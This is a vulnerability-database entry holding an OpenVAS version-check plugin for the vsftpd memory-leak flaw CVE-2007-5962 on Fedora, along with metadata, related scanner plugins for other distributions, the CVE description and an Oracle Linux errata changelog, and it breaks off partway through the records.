ID OPENVAS:860821 Type openvas Reporter Copyright (C) 2009 Greenbone Networks GmbH Modified 2017-07-10T00:00:00
Description
Check for the Version of vsftpd
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for vsftpd FEDORA-2008-4347
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
tag_affected = "vsftpd on Fedora 8";
tag_insight = "vsftpd is a Very Secure FTP daemon. It was written completely from
scratch.";
tag_solution = "Please Install the Updated Packages.";
if(description)
{
script_xref(name : "URL" , value : "https://www.redhat.com/archives/fedora-package-announce/2008-May/msg00681.html");
script_id(860821);
script_version("$Revision: 6623 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $");
script_tag(name:"creation_date", value:"2009-02-17 16:47:15 +0100 (Tue, 17 Feb 2009)");
script_tag(name:"cvss_base", value:"7.1");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:N/A:C");
script_xref(name: "FEDORA", value: "2008-4347");
script_cve_id("CVE-2007-5962");
script_name( "Fedora Update for vsftpd FEDORA-2008-4347");
script_summary("Check for the Version of vsftpd");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
script_family("Fedora Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms");
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("pkg-lib-rpm.inc");
release = get_kb_item("ssh/login/release");
res = "";
if(release == NULL){
exit(0);
}
if(release == "FC8")
{
if ((res = isrpmvuln(pkg:"vsftpd", rpm:"vsftpd~2.0.5~20.fc8", rls:"FC8")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
{"id": "OPENVAS:860821", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for vsftpd FEDORA-2008-4347", "description": "Check for the Version of vsftpd", "published": "2009-02-17T00:00:00", "modified": "2017-07-10T00:00:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=860821", "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["https://www.redhat.com/archives/fedora-package-announce/2008-May/msg00681.html", "2008-4347"], "cvelist": ["CVE-2007-5962"], "lastseen": "2017-07-25T10:57:07", "viewCount": 1, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2017-07-25T10:57:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5962", "CVE-2008-4347"]}, {"type": "exploitdb", "idList": ["EDB-ID:31819", "EDB-ID:31818"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310870114", "OPENVAS:870114", "OPENVAS:860676", "OPENVAS:1361412562310122581", "OPENVAS:860005"]}, {"type": "nessus", "idList": ["FEDORA_2008-4347.NASL", "FEDORA_2008-4362.NASL", "SL_20080521_VSFTPD_ON_SL5_X.NASL", "FEDORA_2008-4373.NASL", "REDHAT-RHSA-2008-0295.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0295"]}, {"type": "redhat", "idList": ["RHSA-2008:0295"]}], "modified": "2017-07-25T10:57:07", "rev": 2}, "vulnersScore": 6.6}, "pluginID": "860821", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for vsftpd FEDORA-2008-4347\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"vsftpd on Fedora 8\";\ntag_insight = \"vsftpd is a Very Secure FTP daemon. It was written completely from\n scratch.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-May/msg00681.html\");\n script_id(860821);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 16:47:15 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-4347\");\n script_cve_id(\"CVE-2007-5962\");\n script_name( \"Fedora Update for vsftpd FEDORA-2008-4347\");\n\n script_summary(\"Check for the Version of vsftpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"vsftpd\", rpm:\"vsftpd~2.0.5~20.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "naslFamily": "Fedora Local Security Checks", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:31:28", "description": "Memory leak in a certain Red Hat patch, applied to vsftpd 2.0.5 on Red Hat Enterprise Linux (RHEL) 5 and Fedora 6 through 8, and on Foresight Linux and rPath appliances, allows remote attackers to cause a denial of service (memory consumption) via a large number of CWD commands, as demonstrated by an attack on a daemon with the deny_file configuration option.", "edition": 4, "cvss3": {}, "published": "2008-05-22T13:09:00", "title": "CVE-2007-5962", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5962"], "modified": "2018-10-15T21:48:00", "cpe": ["cpe:/h:foresight_linux:appliances:*", "cpe:/o:redhat:enterprise_linux:5.0", "cpe:/h:rpath:appliance_platform_agent:*", "cpe:/o:redhat:fedora:8", "cpe:/o:redhat:fedora:7", "cpe:/o:redhat:fedora:6"], "id": "CVE-2007-5962", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5962", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:fedora:8:*:*:*:*:*:*:*", "cpe:2.3:h:foresight_linux:appliances:*:*:*:*:*:*:*:*", "cpe:2.3:h:rpath:appliance_platform_agent:*:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:fedora:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:fedora:6:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-25T10:57:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5962"], "description": "Check for the Version of vsftpd", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860005", "href": "http://plugins.openvas.org/nasl.php?oid=860005", "type": "openvas", "title": "Fedora Update for vsftpd FEDORA-2008-4362", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for vsftpd FEDORA-2008-4362\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"vsftpd on Fedora 9\";\ntag_insight = \"vsftpd is a Very Secure FTP daemon. It was written completely from\n scratch.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-May/msg00691.html\");\n script_id(860005);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 16:47:15 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-4362\");\n script_cve_id(\"CVE-2007-5962\");\n script_name( \"Fedora Update for vsftpd FEDORA-2008-4362\");\n\n script_summary(\"Check for the Version of vsftpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC9\")\n{\n\n if ((res = isrpmvuln(pkg:\"vsftpd\", rpm:\"vsftpd~2.0.6~4.fc9\", rls:\"FC9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5962"], "description": "Check for the Version of vsftpd", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860676", "href": "http://plugins.openvas.org/nasl.php?oid=860676", "type": "openvas", "title": "Fedora Update for vsftpd FEDORA-2008-4373", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for vsftpd FEDORA-2008-4373\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"vsftpd on Fedora 7\";\ntag_insight = \"vsftpd is a Very Secure FTP daemon. It was written completely from\n scratch.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-May/msg00699.html\");\n script_id(860676);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 16:47:15 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-4373\");\n script_cve_id(\"CVE-2007-5962\");\n script_name( \"Fedora Update for vsftpd FEDORA-2008-4373\");\n\n script_summary(\"Check for the Version of vsftpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"vsftpd\", rpm:\"vsftpd~2.0.5~17.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:55:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5962"], "description": "Check for the Version of vsftpd", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870114", "href": "http://plugins.openvas.org/nasl.php?oid=870114", "type": "openvas", "title": "RedHat Update for vsftpd RHSA-2008:0295-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for vsftpd RHSA-2008:0295-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The vsftpd package includes a Very Secure File Transfer Protocol (FTP)\n daemon.\n\n A memory leak was discovered in the vsftpd daemon. An attacker who is able\n to connect to an FTP service, either as an authenticated or anonymous user,\n could cause vsftpd to allocate all available memory if the "deny_file"\n option was enabled in vsftpd.conf. (CVE-2007-5962)\n \n As well, this updated package fixes following bugs:\n \n * a race condition could occur even when the "lock_upload_files" option is\n set. When uploading two files simultaneously, the result was a combination\n of the two files. This resulted in uploaded files becoming corrupted. In\n these updated packages, uploading two files simultaneously will result in a\n file that is identical to the last uploaded file.\n \n * when the "userlist_enable" option is used, failed log in attempts as a\n result of the user not being in the list of allowed users, or being in the\n list of denied users, will not be logged. In these updated packages, a new\n "userlist_log=YES" option can be configured in vsftpd.conf, which will log\n failed log in attempts in these situations.\n \n * vsftpd did not support usernames that started with an underscore or a\n period character. Usernames starting with an underscore or a period are\n supported in these updated packages.\n \n * using wildcards in conjunction with the "ls" command did not return all\n the file names it should. For example, if you FTPed into a directory\n containing three files -- A1, A21 and A11 -- and ran the "ls *1" command,\n only the file names A1 and A21 were returned. These updated packages use\n greedier code that continues to speculatively scan for items even after\n matches have been found.\n \n * when the "user_config_dir" option is enabled in vsftpd.conf, and the\n user-specific configuration file did not exist, the following error\n occurred after a user entered their password during the log in process:\n \n 500 OOPS: reading non-root config file\n \n This has been resolved in this updated package.\n \n All vsftpd users are advised to upgrade to this updated package, which\n resolves these issues.\";\n\ntag_affected = \"vsftpd on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-May/msg00018.html\");\n script_id(870114);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0295-01\");\n script_cve_id(\"CVE-2007-5962\");\n script_name( \"RedHat Update for vsftpd RHSA-2008:0295-01\");\n\n script_summary(\"Check for the Version of vsftpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"vsftpd\", rpm:\"vsftpd~2.0.5~12.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vsftpd-debuginfo\", rpm:\"vsftpd-debuginfo~2.0.5~12.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5962"], "description": "Check for the Version of vsftpd", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:1361412562310870114", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870114", "type": "openvas", "title": "RedHat Update for vsftpd RHSA-2008:0295-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for vsftpd RHSA-2008:0295-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The vsftpd package includes a Very Secure File Transfer Protocol (FTP)\n daemon.\n\n A memory leak was discovered in the vsftpd daemon. An attacker who is able\n to connect to an FTP service, either as an authenticated or anonymous user,\n could cause vsftpd to allocate all available memory if the "deny_file"\n option was enabled in vsftpd.conf. (CVE-2007-5962)\n \n As well, this updated package fixes following bugs:\n \n * a race condition could occur even when the "lock_upload_files" option is\n set. When uploading two files simultaneously, the result was a combination\n of the two files. This resulted in uploaded files becoming corrupted. In\n these updated packages, uploading two files simultaneously will result in a\n file that is identical to the last uploaded file.\n \n * when the "userlist_enable" option is used, failed log in attempts as a\n result of the user not being in the list of allowed users, or being in the\n list of denied users, will not be logged. In these updated packages, a new\n "userlist_log=YES" option can be configured in vsftpd.conf, which will log\n failed log in attempts in these situations.\n \n * vsftpd did not support usernames that started with an underscore or a\n period character. Usernames starting with an underscore or a period are\n supported in these updated packages.\n \n * using wildcards in conjunction with the "ls" command did not return all\n the file names it should. For example, if you FTPed into a directory\n containing three files -- A1, A21 and A11 -- and ran the "ls *1" command,\n only the file names A1 and A21 were returned. These updated packages use\n greedier code that continues to speculatively scan for items even after\n matches have been found.\n \n * when the "user_config_dir" option is enabled in vsftpd.conf, and the\n user-specific configuration file did not exist, the following error\n occurred after a user entered their password during the log in process:\n \n 500 OOPS: reading non-root config file\n \n This has been resolved in this updated package.\n \n All vsftpd users are advised to upgrade to this updated package, which\n resolves these issues.\";\n\ntag_affected = \"vsftpd on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-May/msg00018.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870114\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0295-01\");\n script_cve_id(\"CVE-2007-5962\");\n script_name( \"RedHat Update for vsftpd RHSA-2008:0295-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of vsftpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"vsftpd\", rpm:\"vsftpd~2.0.5~12.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vsftpd-debuginfo\", rpm:\"vsftpd-debuginfo~2.0.5~12.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5962"], "description": "Oracle Linux Local Security Checks ELSA-2008-0295", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122581", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122581", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2008-0295", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2008-0295.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122581\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:48:35 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0295\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0295 - vsftpd security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0295\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0295.html\");\n script_cve_id(\"CVE-2007-5962\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"vsftpd\", rpm:\"vsftpd~2.0.5~12.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5962"], "description": "[2.0.5-12]\n- fix CVE-2007-5962: vsftpd memory leak when deny_file option is set\n- Resolves: #423001\n[2.0.5-11]\n- add new option to log login failures based on user list\n- Resolves: #345791\n- fix user_config_dir option\n- Resolves: #400921\n- allow usernames starting with '_' or '.'\n- Resolves: #386561\n- fix the write/race condition when uploading files simultaneously\n- Resolves: #240553\n- fix the bug that causes every new file stored with STOU to have a prefix '.1'\n- Resolves: #392231\n- make vsftpd wildcard matching more greedy\n- Resolves: #392181", "edition": 4, "modified": "2008-05-30T00:00:00", "published": "2008-05-30T00:00:00", "id": "ELSA-2008-0295", "href": "http://linux.oracle.com/errata/ELSA-2008-0295.html", "title": "vsftpd security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "redhat": 